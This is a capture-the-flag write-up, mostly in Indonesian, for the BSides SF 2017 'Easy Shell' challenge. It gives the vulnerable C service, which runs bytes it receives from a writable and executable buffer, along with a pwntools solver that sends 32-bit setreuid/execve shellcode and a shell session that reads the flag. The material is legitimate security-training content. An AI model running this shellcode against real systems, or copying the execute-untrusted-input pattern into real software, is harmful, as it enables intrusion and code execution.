BSide 2017 - Easy Shell

Masalah

Diberikan source code easyshell.c.

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#define LENGTH 1024
#define disable_buffering(_fd) setvbuf(_fd, NULL, _IONBF, 0)

/*
 * Challenge service entry point: reads up to LENGTH bytes from stdin into an
 * anonymous read/write/execute mapping and then calls into that mapping.
 * Running client-supplied bytes is the whole program; nothing inspects the
 * input between read() and the call.
 *
 * Returns 0 if the called code returns; exits with status 1 when read() fails.
 */
int main(int argc, char *argv[])
{
  /* The mapping is writable and executable at the same time, so whatever
   * read() stores here can run as code without any further memory-corruption
   * bug; a W^X policy exists to forbid exactly this combination.
   * NOTE(review): the result is never compared with MAP_FAILED, and fd 0 is
   * passed with MAP_ANONYMOUS where portable code passes -1. */
  uint8_t *buffer = mmap(NULL, LENGTH, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  ssize_t len;

  /* Schedule SIGALRM in 10 seconds. No handler is installed in this function,
   * so the default action (process termination) bounds each session. */
  alarm(10);

  /* disable_buffering() expands to setvbuf(..., _IONBF, 0): the prompt below
   * reaches the client immediately instead of sitting in a stdio buffer. */
  disable_buffering(stdout);
  disable_buffering(stderr);

  printf("Send me stuff!!\n");
  /* A single read() of at most LENGTH bytes from fd 0 (stdin). */
  len = read(0, buffer, LENGTH);

  /* Only a negative return is rejected. len == 0 (EOF) and short reads fall
   * through to the call below with the rest of the mapping still zero-filled. */
  if(len < 0) {
    printf("Error reading!\n");
    exit(1);
  }

  /* Indirect call to the first byte of the buffer: control transfers to the
   * bytes just received. The asm statement declares no clobbers, so the
   * compiler assumes registers and memory are unchanged if the call returns. */
  asm("call *%0\n" : :"r"(buffer));

  return 0;
}

Kompilasi dengan perintah:

# Compiler; ?= keeps a value already supplied by the environment or command line.
CC?=gcc
# NOTE(review): OBJS names easyshell.o, but the recipe below compiles
# easyshell.c directly and never uses the object file.
OBJS=easyshell.o

# -m32 produces a 32-bit x86 binary, so any code the service executes must be
# 32-bit x86 as well. CFLAGS is taken from the caller; none are set here.
# NOTE(review): make requires recipe lines to start with a tab; the leading
# spaces shown here are presumably a rendering artifact - confirm.
easyshell: ${OBJS}
    ${CC} -m32 ${CFLAGS} -o easyshell easyshell.c

# Remove build outputs and core dumps.
clean:
    rm -fv *.o easyshell core core.*

Narasi:

The server will run any code you send it. Easy peaasy!

The flag is in /home/ctf/flag.txt

nc easyshell-f7113918.ctf.bsidessf.net 5252

Penyelesaian

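Alur program hanya menerima input lalu langsung mengeksekusinya: buffer dialokasikan lewat mmap dengan izin PROT_READ | PROT_WRITE | PROT_EXEC, diisi oleh read() hingga 1024 byte, kemudian langsung dipanggil dengan instruksi call tanpa validasi apa pun. Karena biner dikompilasi dengan -m32, kode yang dikirim harus berupa kode x86 32-bit. Untuk mengeksploitasinya, kirimkan shellcode saja.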

Script solver.py:

from pwn import *

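# 32-bit x86 Linux shellcode (int 0x80 ABI): setreuid(0, 0) followed by
# execve("/bin//sh").
# The literal must not be wrapped with a backslash-newline inside an escape:
# splitting "\x73" that way makes Python drop the backslash and emit the text
# "x73" instead of the byte 0x73, which corrupts the payload. Adjacent literals
# inside parentheses keep the lines short without that hazard.
# A bytes literal is sent unchanged by pwntools on both Python 2 and Python 3.
shellcode = (
    b'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f'
    b'\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
)
# Remote
# x = remote('easyshell-f7113918.ctf.bsidessf.net',5252)
# Local
x = process('easyshell')
# Consume the "Send me stuff!!" banner before sending anything.
x.recvline()
# sendline() appends a newline; the payload stays far below the 1024-byte
# read() limit in easyshell.c.
x.sendline(shellcode)
# easyshell.c calls alarm(10), so the session is cut off about ten seconds
# after the service starts.
x.interactive()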

Output yang dihasilkan (saat dijalankan terhadap server remote) antara lain:

[+] Opening connection to easyshell-f7113918.ctf.bsidessf.net on port 5252: Done
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /home/ctf/flag.txt
FLAG:c832b461f8772b49f45e6c3906645adb
[*] Got EOF while reading in interactive
